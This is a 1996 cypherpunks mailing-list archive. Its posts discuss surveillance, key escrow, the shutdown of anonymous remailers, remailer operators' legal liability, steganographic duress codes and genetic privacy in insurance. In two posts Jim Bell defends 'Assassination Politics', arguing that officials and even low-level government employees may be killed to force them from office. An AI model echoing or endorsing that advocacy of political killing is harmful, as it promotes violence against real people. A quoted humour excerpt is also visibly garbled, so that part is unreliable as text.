filmed having sex in an elevator, and the footage sold on a 
video tape, didn 't  have any particular legal recourse.

if people want to study what social effect that widespread
surveillance has, and what its true cost is, I hope that they
look toward Britain to try to gauge some of the effects. apparently
the trend has been in motion there long enough that some serious
studies might be made.

the privacy debate reminds me of speed limits. there is one
side that says, "55 saves lives" and in their tiny brains
think that is the end of the argument. well, 
"50, 45, 40, 35, 30 ..." save lives too.  why did you pick 55?
the point is that there are other factors.

similarly, with police surveillance, small-brained police often
say, "video cameras prevent crimes" and think that is the end
of the argument. or, if you are in NSA, "restricting worldwide
crypto keeps the planet in order". etc. ad infinitum. pathetically
simplistic arguments that the general public does not always
see through. when the public does begin to see through them,
and expect answers that are more complicated than can be 
explained in 30 second sound bites, then I'd say we're making
a bit of progress toward rationality.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 27 May 1996 06:36:10 +0800
To: Matt Blaze <mab@research.att.com>
Subject: Re: "Key Escrow without Escrow Agents"
In-Reply-To: <199605250132.VAA09818@nsa.tempo.att.com>
Message-ID: <199605252056.NAA28915@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



the splitting of the keys among different *private*
sites, in such a way that key requests must be revealed publicly,
is an interesting idea.
the way that individual sites evaluate revelation requests 
might usefully be compared to "juries" in our society. 

in the case of the grand jury, the government invites a set
of citizens to determine if an indictment is justified. their
consensus opinion determines the decision.

in the case of conviction, we have a similar system.

the idea of "jury nullification" has a direct analogy as well.
in the key escrow scheme MB proposes, if a lot of sites refuse to release
keys based on the circumstances of the case, that would be
very similar to jury nullification.

I can see that you might create a code of law that determines
what procedures that these "distributed key juries"  are supposed
to follow. but like our legal system, the interpretation and
application is ultimately left up to them.

an interesting system, that is commendable for trying to
find a compromise between two seemingly irreconcilable polarities
(privacy and surveillance) but I doubt anyone in law enforcement
(with the mindset, "I can't be stopped from doing my job as I
see fit or criminals will get away") would go for it in the current form.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 27 May 1996 06:51:05 +0800
To: cypherpunks@toad.com
Subject: holographic remailing & the scientologists
Message-ID: <199605252119.OAA00566@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




it seems that anonymous remailing has split into two basic
areas, each with distinct requirements and demands and problems:

1. private mail, sent to another email address

2. posts to Usenet or other forums such as mailing lists.


now, interestingly, apparently most of the extremely heavy 
political backlash has come against (2), causing Hal Finney
for example to advocate or suggest that remailers not be 
designed for posting but be limited to emailing to individual
users somehow. (he didn't mention how mailing lists would be
handled, but one might screen out email addresses that
are "known mailing list addresses" or something like that)

regarding (2), with scientology, I was trying to imagine
how one could accomplish the same feature of distributing
information anonymously in a "public place", 
but without giving the scientologists
the ability to track a particular origination of the email,
even remailers.

Chaum's DC net idea is a useful approach. here I'd like to 
suggest another.

some time ago someone had the amusing idea of cutting up the
PGP binary code, UUencoded, and putting all the zillions of
pieces in peoples signatures. each person would send mail
to the signature server to pick up one of the 1/n pieces,
and they would put it in their messages.

frankly, I think this was a great idea that we could explore
some more. in a sense, it stores data "holographically" over
all kinds of different people's messages. imagine a system in which
the scientology documents are stored in people's signatures,
and someone writes software to go and recombine the documents
based on finding signatures "out there".

this could be applied to one newsgroup by having remailers post
only tiny pieces of the material, but with enough on the newsgroup
at any time to recombine them all with the software, but far
too many pieces for the scientologists to attack all the remailers
they are sent through. (people could post them through their regular
email addresses). furthermore anyone posting a piece has
a sort of minor plausible deniability. ("I just copied the
signature from so-and-so as a protest, I have no idea what it
refers to")

==

this all suggests to me the following idea. suppose that some
document has been created that someone wants censored. how could
net citizens protest this censorship? one scheme would be for
everyone to put a tiny piece of the document in their signatures.
if you get enough people to do this, it may actually be the case
that at any one time, just because of the randomness of all the
pieces available, the news server has enough messages
archived for a program to scan the message directories and reconstruct
the documents from all the pieces that are found. these "pieces"
could even be stored solely in the netnews header fields.

another idea involves the concept behind "spread spectrum". in
this system, little pieces of data are spit out in different
places, or channels, and the source and the reciever are scanning
the exact same channel at the same time based on exact synchronization.
I guess an analogy to usenet would be tiny pieces of data showing
up in seemingly random newsgroups, but which are followed or "caught"
exactly by the "reconstruction software".

some interesting ideas related to steganography 
that some people might like to play with.

==

for a model of the scientology problem, 
it appears that what we have is a set of email addresses (S) and
a public forum that essentially reaches some large subset of these
people (S2).  a person wishes to send out a secret document
to S2, but he can't do so by posting to the forum, because then
the censors "see" him and shut him down. but what he
*can* do is send lots of pieces to a group of people in S, and
each of these people individually posts their piece. (the censors have
no control over mail sent between individuals, only that posted
collectively). 

possibly, then, there is no single target of "who posted the material"
for the censors to clamp down on, and the information eventually
can be reconstructed by all S2.

==

key ways what I am proposing is different than some of the other
"cut up the anonymous messages and recombine" proposals out there: 

1. the recombination is not done by a remailer. it is done by anyone
who can run software on the newsserver (i.e. reading the directories).
the scientologists or "censors" cannot tell who is doing this.

2. the messages are not completely comprised of the data to be sent.
the data could be stored in headers or the signatures of otherwise
"legitimate" messages.

note that the same scheme could be applied to web pages. you could
store a document "holographically" in which pieces are obtained
at all kinds of different URLs. it would be laughable for the 
censors to try to get court orders against individual pieces.
and furthermore, the entire document is not stored anywhere "out
there" in particular but recombined by anyone. the scientologists
don't know who.

note that I am giving the scientologists a lot more credit for
their enmity than they deserve. they have mostly lost their war
already in many ways, and they aren't a very serious threat
to cyberspace in general, imho. they have shown an amazingly
unabated aggression & zeal against remailer operators, however,
something that could possibly be derailed with a little 
ingenuity.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 27 May 1996 07:04:20 +0800
To: Joined Trill <drosoff@arc.unm.edu>
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <199605252140.OAA04527@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:39 AM 5/25/96 -0400, Subir Grewal wrote:

>I think an insight your analysis may benefit by is that certain
>institutions/societal norms create incetives for "corrupt politicians".
>Hayek argues against the "benevolent dictator" concept because he says no
>gentle person would ever aspire to be a dictator.  The system itself calls
>for people who are ruthless to take the reins.  A similar argument can be
>made for the various functions of a modenr democracy (like the US).  It is
>rarely that we hear of a considerate IRS auditor, or a principled
>politician.  The structures themselves call for and promote those who (in
>that an individual is more successful if they) are corrupt, power-hungry,
>unprincipled and ruthless.

Which means that attempting to clean up the system by half-measures is 
doomed to failure, wouldn't you say?


>As for Assasination Politics, I can understand such proposals in jest. 

Ironically, I originally proposed it to myself in jest.  However, I quickly 
realized that there was far more to it than a joke.  I went through most of 
the objections that were later commonly raised against it, and then 
concluded that those objections were invalid. I also noted that most people 
recognized the flaws in those objections after they were explained to them.  
It has the prospect of enormously changing society.   Too many pieces fell 
into place, like a jigsaw puzzle.  This system is NOT an accident; it is 
fundamental.  Admittedly, it is still a bit scary, because of the depth of 
its changes, but that does not make it wrong! 

> I too say things to appear controversial. 

AP was not publicized "to appear controversial."  I think it's 
"controversial" simply because it is so different from the current system, 
and those in power in that system (and their sympathizers) realize how 
serious and enormous such a change would be.

> As a serious political structure, however, it is reprehensible.  

Unfortunately, that's not a particularly specific claim.  "reprehensible"?  
I'd call the current system reprehensible.  Why should the government be 
able to put over a million people in prison, most for victimless drug 
crimes? Why should the government be able to start a war and send millions 
of people against their will, and thousands to die (as in Vietnam)?  Why 
should their be repeated mass killings (Armenia, Russia, Germany, China, 
Uganda, Cambodia, Rwanda, etc)?  If you could show that the current system 
had somehow been fixed to prevent these kinds of incident, you might have a 
point, but you cannot.

Your claim is also biased:  Everything you think about the term, 
"political," is based on the kind of systems you know and have known.  For 
you, and most of us, politics is just about defined as that system by which 
a small number of people manipulate a larger number, ostensibly guided by 
the wishes of the larger number.


>  Murder cannot be condoned (as a pacifist,
>the argument that politicians create wars and must be killed for that
>reason does not hold much water for me) 

Then you need to learn to be more consistent.  While you may, indeed, be a 
pacifist, most of the rest of us see nothing wrong with the concept of 
self-defense.  You may argue as to what's really self-defense and what 
isn't,  but the reality is that government engages in violence and the 
threat of violence regularly.  Are you, by your statements, implicitly 
tolerating violence by government that you wouldn't tolerate from 
individuals?  It is easy to fall into such a trap.


>and the proponents of such systems
>would do well to look more closely at the systemic ills rather than 
individuals.

Why?  Isn't it possible that it is not possible to reform a system because 
embedded within it is a fundamental flaw which makes real freedom 
impossible?  The current system is heirarchically structured, and results in 
situations where millions die in the place of the very few.  I'd say that's 
a serious, systemic flaw that needs fixing.

> The argument that AP is an institutional dis-incentive for
>"bad" representatives that offsets other incentives is problematic since I
>do not believe the methods are just.

I invite you to provide an alternative solution.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.org (Ulf Moeller)
Date: Sun, 26 May 1996 00:06:52 +0800
To: unicorn@schloss.li
Subject: Re: Remailers - What exists?
In-Reply-To: <autopost.833024455.3954@ulf.mali.sub.org>
Message-ID: <m0uNImK-00009rC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


>Which remailers can be run without root?
>Which remailers can be run best on the most systems?
>Which remailers are easiest to set up?

I guess Mixmaster wins in all categories.

-- 
`Der Staatsanwalt empfiehlt der Lufthansa, die Linie Moskau-Muenchen
 einzustellen, weil nicht sichergestellt werden kann, dass dort keine
 BND-Mitarbeiter Plutonium schmuggeln.'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Mon, 27 May 1996 06:43:31 +0800
To: cypherpunks@toad.com
Subject: Remailers & liability
Message-ID: <2.2.16.19960525223433.092f4224@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain



Hello again to list folks. Had to disappear for a bit due to school & work,
but am back for a few weeks before the bar. (doh.) I upgraded from Eudora
Lite to Eudora Pro before resubscribing and find its filtering makes the
cpunks traffic much more manageable. Cheerfully recommended to everyone
who's still got cpunks dumping in their regular mailbox and cursing at the
lack of mail kill files. 

Have been following the discussion re remailers & liability. The use of
waivers and hold-harmless clauses and ROT13 and all of the rest seems like
it might have some potential where the potential plaintiff you're worried
about is a message recipient angered or shocked by receiving mail which
bothers them.

I don't think they'll do much good where the potential plaintiff is a third
party whose gripe is that the material was distributed. I'm thinking here of
copyright plaintiffs like Newsweek or Brad Templeton/Clarinet or the Church
of Scamentology, or a person concerned about invasion of privacy or
defamation. A recipient can't waive/disclaim the rights of a third party,
and an indemnity clause isn't worth much without assets and an honest
intention to back it up. Waivers and disclaimers also aren't likely to be
any help against criminal charges, because the aggrieved party is the State,
not the "victim".

The real key to long-lasting remailers is relatively judgement-proof
remailer operators who aren't scared of going to court. (cf. Grady Ward and
Arnie Lerma) Remailer operators are first amendment activists who are going
to take heat the same way that environmental and anti-abortion activists
have. I talked with one woman who was hit with a judgement by a timber
company after she & other activists blocked logging equipment, causing the
timber company to lose money (_Huffman-Wright v. Wade_, 317 Or 445, 452, 857
P.2d 101 (1993)) - her comment was that she's able to maintain a reasonable
but not luxurious life with the roughly $9000 per year income that the
judgement creditor can't touch, and that the minimal possessions which can't
be seized by the sheriff are enough for her. Remailer operators may have to
choose between comfortable living and their commitment to the principle of
free speech. 

Remailers are attempting to do something that the legal system is hostile to
- allow action (potentially harm) without corresponding liability. (If the
remailer's not liable, and the sender isn't identifiable, there's nobody to
sue and nobody to throw in jail.) Some people on the list take the position
that sending and receiving electronic data cannot create the sort of harm
that the legal system ought to concern itself with. While this might be the
case (I'm not convinced yet either way), it's certainly not the law. Lots of
tricky lawyers spend lots of time trying to structure relationships so that
it's possible to have activity without liability for their clients. As far
as I can tell, the way to achieve this result is through public relations
and lobbying (e.g., "tort reform"). Unfortunately, remailer operators aren't
as sympathetic as big insurance companies, so we may lose out. :( 

For what it's worth, I'm still planning to run a remailer again when I get
settled down somewhere. (I don't think remailers do much good where the
operator isn't root, so I'm not bothering with trying to run one on someone
else's system.) My debt/asset ratio is bad enough from all of this school
that I don't have much for anyone to levy against. Ha, ha. Anyone want some
rapidly obsolescing computer and law books? :(

--
Greg Broiles                |"Post-rotational nystagmus was the subject of
gbroiles@netbox.com         |an in-court demonstration by the People
http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
                            |Studdard." People v. Quinn 580 NYS2d 818,825.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@jpunix.com>
Date: Mon, 27 May 1996 06:42:50 +0800
To: mix-l@jpunix.com>
Subject: Several things..
Message-ID: <Pine.NEB.3.93.960525152627.10896J-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

1. Damn! Another remailer bites the dust. I've removed ncognito from the
type2.list/pubring.mix combo on jpunix.com. The updated lists are
available by web (www.jpunix.com) and by anon FTP (ftp.jpunix.com). 

2. I wonder if we are going to see more "middleman" remailers now that the
code has been released? Anyone have any thoughts or ideas on the subject? 

3. Since remailers are dropping like flies, I've decided to bite the
bullet and wake up nymrod. I no longer have the obligations that I had in
the recent past that caused me to question running a nym server. I can now
do so with a clear, unfettered conscience. Nymrod is now awake and active,
ready to accept your nyms on nym.jpunix.com. The two names that that nym
server will answer to are: 

nymrod@nym.jpunix.com (preferred)
alias@nym.jpunix.com (to support some nym packages)

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMadvJ1OTpEThrthvAQFrwAQAqcUIMAnSliEX5eZ9R30+NMk3pmrYuxEH
TvzdK0mMfvkP+i+/1hj1muw+yAmomNogaphXYMbHDFBYCXjNscFSMCCWyECsjE6H
Jm5B8/FzRYuLy83JugHE6KGLcmRkZeSmxG6p7O3W/IAoO2ThAyW8YYYOBZGASqQy
qD1gEFWO9EI=
=GpYT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Mon, 27 May 1996 06:52:45 +0800
To: cypherpunks@toad.com
Subject: nCognito is Dead..
In-Reply-To: <Pine.NEB.3.93.960525061231.6707C-100000@alpha.jpunix.com>
Message-ID: <Pine.A32.3.93.960525155235.39848B-100000@navajo.gate.net>
MIME-Version: 1.0
Content-Type: text/plain



Well I have been given my notice to terminate the remailers running at
this account. Make a note to remove ncognito from your type2.list, and
those running pingers, please remove nCognito as soon as its convenient.

Below i've quoted verbatim the request to shutdown that I received. PLEASE
note that there is no mention of FBI, NSA, or Co$. :)  The request is the
result of some errors that mix generated while I was makeing changes, that
resulted in the administration at gate.net noticing the remailer. Frankly,
I cant blame them given the current legal climate.

Although I would have liked to continute operating the remailers, I must
admit that I'll sleep better at night now that its gone. 

BTW: Does anyone know of a few ISP's that accept cash and dont require
verification of your identity? :)


-----------------------------------------------------------------------------
>From gli@gate.net Sat May 25 15:51:35 1996
Date: Sat, 25 May 1996 15:45:19 -0400 (EDT)
From: gli@gate.net
To: Ben Holiday <ncognito@gate.net>
Subject: Re: Problems with your mail mix program

Please note that CyberGate does not support remailer program so please stop
running it on gate.net immediately. Repeated violation will cause your login
privilege compromised. Your cooperation will be appreciated.

Gary Li
Systems Administrator
CyberGate, Inc.

--------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 27 May 1996 06:46:01 +0800
To: Jim Choate <cypherpunks@toad.com
Subject: PILATE SAYETH UNTO HIM...
Message-ID: <199605252330.QAA10379@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:30 AM 5/24/96 -0500, Jim Choate wrote:
> Sorry but the very fact that I don't agree with you is proof enough that
> there is no absolute 'Truth' as you use it. That is  unless you are
> attempting to claim absolute omnipotence on the point of determination.

Say Jim, did you major in sociology literature:

Here is Dave Barry on college and truth:


   After you've been in college for a year or so, you're supposed to
 choose a major, which is the subject you intend to memorize and 
 forget the most things about.  Here is a very important piece of 
 advice: Be sure to choose a major that does not involve Known Facts 
 and Right Answers.
     
  This means you must *not* major in mathematics, physics, biology,
 or chemistry, because these subjects involve actual facts.  If, for 
 example, you major in mathematics, you're going to wander into class 
 one day and the professor will say: "Define the cosine integer of 
 the quadrant of a rhomboid binary axis, and extrapolate your result 
 to five significant vertices." If you don't come up with *exactly* 
 the answer the professor has in mind, you fail.  The same is true of 
 chemistry: if you write in your exam book that carbon and hydrogen 
 combine to form oak, your professor will flunk you.  He wants you to 
 come up with the same answer he and all the other chemists have 
 agreed on.  Scientists are extremely snotty about this.
     
   So you should major in subjects like English, philosophy,
 psychology, and sociology -- subjects in which nobody really 
 understands what anybody else is talking about, and which involve 
 virtually no actual facts.  I attended classes in all these 
 subjects, so I'll give you a quick overview of each:
     
 read little snippets of just before class.  Here is a tip on how to 
 get good grades on your English papers: Never say anything about a 
 book that anybody with any common sense would say.  For example, 
 suppose you are studying Moby-Dick.  Anybody with any common sense 
 would say that Moby-Dick is a big white whale, since the characters 
 in the book refer to it as a big white whale roughly eleven thousand 
 times.  So in *your* paper, *you* say Moby-Dick is actually the 
 Republic of Ireland.  Your professor, who is sick to death of 
 reading papers and never liked Moby-Dick anyway, will think you are 
 enormously creative.  If you can regularly come up with lunatic 
 interpretations of simple stories, you should major in English.
     
   PHILOSOPHY: Basically, this involves sitting in a room and
 deciding there is no such thing as reality and then going to lunch. 
 You should major in philosophy if you plan to take a lot of drugs.
     
   PSYCHOLOGY: This involves talking about rats and dreams.
 Psychologists are *obsessed* with rats and dreams.  I once spent an 
 entire semester training a rat to punch little buttons in a certain 
 sequence, then training my roommate to do the same thing.  The rat 
 learned much faster.  My roommate is now a doctor.
     
   If you like rats or dreams, and above all if you dream about rats,
 you should major in psychology.
     
   SOCIOLOGY: For sheer lack of intelligibility, sociology is far and
 away the number one subject.  I sat through hundreds of hours of 
 sociology courses, and read gobs of sociology writing, and I never 
 once heard or read a coherent statement.  This is because 
 sociologists want to be considered scientists, so they spend most of 
 their time translating simple, obvious observations into 
 scientific-sounding code.  If you plan to major in sociology, you'll 
 have to learn to do the same thing.  For example, suppose you have 
 observed that children cry when they fall down.  You should write: 
 "Methodological observation of the sociometrical behavior tendencies 
 of prematurated isolates indicates that a casual relationship exists 
 between groundward tropism and lachrimatory, or 'crying,' behavior 
 forms." If you can keep this up for fifty or sixty pages, you will 
 get a large government grant.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 27 May 1996 05:23:28 +0800
To: cypherpunks@toad.com
Subject: Software Fame and Fortune
Message-ID: <199605251653.QAA15534@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The EcoMist of May 25 has a special survey (80 kb) of the global software
industry, which, the report claims, is the next fountainhead of computer
fame and fortune, thanks to the Internet, and the successor to the H/W
fairy tales. 
 
 
It barely mentions crypto -- described as a prime commercial product of
Israel's defense industry and the key to secure fame and fortune! 
 
 
It can be read-only at: 
 
 
     http://pwp.usa.pipeline.com/~jya/software.txt 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 27 May 1996 06:48:27 +0800
To: llurch@networking.stanford.edu
Subject: Re: Children's Privacy Act
Message-ID: <01I54Q46PC5C8Y4ZHR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"llurch@networking.stanford.edu"  "Rich Graves" 25-MAY-1996 02:09:28.75

>I'm sure you know the law and practice better, but my insurance seems to
>have a "preexisting conditions" clause. Knowingly doing the above
>constitutes fraud. (Of course lots of people probably get away with it.)

	And how's the insurance company going to know that something is a
preexisting condition when they can't keep records of it? Moreover, partially
due to state laws, most preexisting condition exemptions have limits on how
long they last; if someone has a 1-year window, and they sign up more than 1
year after when they find out about their having Huntington's, then it will be
covered despite their knowing about it.

>Moreover, when the insurance company pays out, that ultimately comes out
>of premiums. I don't have Huntington's, but I don't mind paying an extra
>$X into a risk pool for people with Huntington's because it means I don't
>have to submit to genetic screening, either. You don't have to have
>something to hide to see it as an invasion of privacy. It's a pool of
>consumers establishing preferences, not just individual consumers v. 
>producers. The meaning of microeconomics changes as it scales.

	This would be the case if the laws in question didn't exist. If you
don't want to get genetic screening - because you have Huntington's or because
you don't like genetic screening - it should be perfectly possible for you to
make that choice, and pay the higher premiums. But it should also be possible
for someone to make the opposite choice; that's what current laws prevent. It
is not, at present, consumers establishing preferences - it's the majority
dictating its preferences to the minority.

>By "fairness" I meant that equal risks should be treated equally. Cost of
>disease A = cost of disease B. The detection of predisposition to disease
>A is politically feasible, but the same isn't true for disease B. I'd say
>you were discriminating against people predisposed to disease A, because
>they're paying into the risk pool for B, but B isn't paying into the risk
>pool for A. 

	That's an argument against any restrictions on risk. Currently, in most
states it is politically feasible to get higher rates for someone addicted to
nicotine, even if the person became addicted when they were too young to be
responsible for their own actions (generally the case). But in some of those
same states, genetic screening is banned. Aren't you being unfair to the
smoker?
	Some people argue for community risk pools, in which everyone in a
community gets the same rate. But shouldn't someone who is sicker because of
his/her own choices (e.g., chooses to have unprotected sex) pay a higher rate?
But such choices are what I'd call even more private than genetics. Whether
I've had unprotected sex in the past 5 years is a lot more intrusive a question
than whether I have any genetic diseases in my family tree. 
	Quite simply, politically unfeasible means should be removed from the
realm of politics.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 27 May 1996 06:39:34 +0800
To: jimbell@pacifier.com
Subject: Re: Announcing CryptaPix 1.0
Message-ID: <01I54Q9TVIC68Y4ZHR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jimbell@pacifier.com"  "jim bell" 25-MAY-1996 03:29:13.89

>What they ought to do is to "stegofy" this system by binding a picture with 
>a lower-quality, non-suspicious picture which can be brought up with a 
>"duress code." 

	The idea has come up before; I raised it a while back, for instance.
Your simple version has the problem that if the system is known to hide info in
this way, the cops or whoever will just pressure you for the other picture's
code. Really, the only way to get around this is to have a system that allows
an indeterminate (from the perspective of those who don't have all the phrases)
number of pictures/blocks of text/whatever to coexist, thus allowing one to
pull up a subset of them and realistically claim that that's all of them.
While, as Uni has pointed out, a judge can still toss you in jail for contempt
of court, that is preferable to the results for the discovery of some other
information (i.e., that which would get you the death penalty).
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 27 May 1996 06:46:57 +0800
To: bruce@aracnet.com
Subject: Re: Children's Privacy Act
Message-ID: <01I54QLMVIVO8Y4ZHR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"bruce@aracnet.com"  "Bruce Baugh" 25-MAY-1996 09:21:06.18

>I don't see that this is necessarily true for information any more than it
>is property. Property can be bought, sold, traded, given away, made...but it
>can also be stolen. Just as I have a right to complain if you walk off with
>my couch without my permission, so if you walk off with data on my blood
>chemistry or credit history without my permission.

	Certainly, if you were coerced into giving up this information, it
would be wrongful - including to knowingly retransmit it. But that's only the
case for dealing with governments (and, I would include, other coercive groups
such as monopolistic and oglipolistic corporations). You do have a choice in
dealing with other entities. I make that choice; I minimize my use of a credit
card, for instance. I've had months where my bill was $0.00. Now, if the
agency in question is required to collect such information because of coercion,
then that's wrongful, and that information shouldn't be retransmitted.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Mon, 27 May 1996 06:37:46 +0800
To: cypherpunks@toad.com
Subject: Re: Children's Privacy Act
Message-ID: <2.2.32.19960526010616.006a3d14@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:45 PM 5/25/96 EDT, E. ALLEN SMITH wrote:

>such as monopolistic and oglipolistic corporations). You do have a choice in
>dealing with other entities. I make that choice; I minimize my use of a credit
>card, for instance. I've had months where my bill was $0.00. Now, if the
>agency in question is required to collect such information because of coercion,
>then that's wrongful, and that information shouldn't be retransmitted.

Righ. But in addition to the forcible acquisition of information, there's
the unwitting acquisition - you are never informed that party A has
transmitted information X to party B, who in turn passed it to C, who
garbled it and then passed the erroneous info to D....

I'm a raving anarcho-capitalist, and I see not the slightest ethical problem
in requiring people to tell me what information they're gathering on me. At
that point I can make an informed decision to deal or not deal with them -
and that's a complex decision. I might well prefer to do business with, say,
Tim's House O' Stuff even though it's collecting more info than I'd prefer,
if there are compensatory factors. But I can't weigh my options in a void.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: herodotus@alpha.c2.org
Date: Mon, 27 May 1996 06:28:17 +0800
To: cypherpunks@toad.com
Subject: telnet anonymizer?
Message-ID: <199605260130.SAA07374@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of a publicly available site that provides telnet
anonymizing/proxying?

--
Herodotus <herodotus@alpha.c2.org>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Mon, 27 May 1996 06:27:51 +0800
To: "E. ALLEN SMITH" <remailer-operators@c2.org
Subject: Re: Mixmaster version usable with POP?
Message-ID: <adcd6b4709021004cd63@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:22 PM 5/25/96, E. ALLEN SMITH wrote:
>        One application of an anonymous remailer that has come up is using POP
>to get into an account via which remailing could be done without the remailer
>having to run on the machine receiving/sending the mail. It would instead occur
>on a machine running the remailer software and equipped for doing POP. Has
>anyone written a mixmaster version (or additions onto Mixmaster) that will do
>this automatically?
>        While having the entire remailer with logs and private key in a
>different country would still be best, if an anonymous POP account were used
>this would still shield the remailer operator from forced disclosure. It would
>also cut down on the costs; for instance, offshore.com.ai's monthly price for
>a UNIX shell account is 50$ a month, but theirs for an email-only account is
>20$ a month (albeit with only 20 M/month of mail).
>        Thanks,
>        -Allen

While there is not an "out of the box" version of Mixmaster like this, it
would be easy to do. The UNIX POP clients I have seen just dump the mail
into a mbox formated file. A simple script could be written to yank out the
messages one at a time, and feed them to Mixmaster (or mail-in or
whatever). In fact, the more recent versions of Mixmaster should be able to
swallow the file whole, pulling out the mixmaster messages itself. This
modification was made to support "subway" remailers, which want to send a
fixed number of messages (in one email) each time period.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 27 May 1996 06:49:58 +0800
To: Joined Trill <hostmaster@trill-home.com>
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <199605260254.TAA14336@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:48 PM 5/25/96 -0400, Subir Grewal wrote:

>The exception I took to your proposal was that it seemed like a
>half-measure to me.  From what I understand of it the porposal is that
>elected officials who "do wrong" (or violate a particular code of conduct)
>should be killed.  I would suggest that this is problematic because it
>does nothing to solve the ills of the system, simply clears those players
>whom a particular set of people do not believe are playing fairly/well.

And any successors that take their place, as well.  Remember, even a tiny 
fraction of the population can eject (by forced resignation or worse) an 
officeholder.  The only ones who survive (literally or figuratively) are the 
ones who don't irritate even a tiny fraction of the public.  Those will be 
the ones who don't do anything, and are not paid by stolen taxes.

>I'm not sure I'd accept the claim that millions of offenders (I too find
>drug laws stifling, illogical and counter to the liberal ideal) are put in
>jail, deprived of their freedom by a particular set of people.  Drug laws
>are a reflection of the opinions held by many people in this country (and
>others), of course we wonder sometimes whether people have really thought
>about it or whether the "just say no" jingle was too irresistable, and the
>concept of "a war on drugs" another tool to define outsiders against whom
>to band against and maintain a cohesive identity.

To a great degree, the "public perception" of drugs and drug laws has been a 
_product_ of the news media, in particular the TV networks and the 
newspapers, as influenced by the government.  Study the matter and you'll 
find this is true.  There is no reason to believe that the community will be 
as anti-drug as the conventional wisdom says they are.

> And the manner in which
>Americans (and indeed other peoples) have been whipped into fervour by
>the rhetoric that accompanies a war is truly frightening. 

This "whipping" is quite intentional.  It keeps cops, prosecutors, and 
judges employed.  Not to mention politicians.


> But I reall
>don't think killing a few Presidents or Joint Chiefs of Staff or Prime
>Ministers will solve this (or anything).

Please understand:  While the term "assassination" is usually used to refer 
to killings of high-level people, I'm using a broader definition to refer to 
ANY target, including middle and lower-level people.  My solution is far 
more thorough than you've implied.  Anyone who exercises force for the state 
is subject to "recall."  Even people who just take a government paycheck are 
at least nominally at risk.


>  It seems as if you were trying
>to say that AP is acceptable because similar methods are employed by the
>state all the time.  I will not defend the coercive actions of the state,
>but I do not believe they give one the right to coerce others, especially
>if they are removed from the actual act.

How "removed" do they have to be to be innocent, in your opinion?

>:Then you need to learn to be more consistent.  While you may, indeed, be a
>:pacifist, most of the rest of us see nothing wrong with the concept of
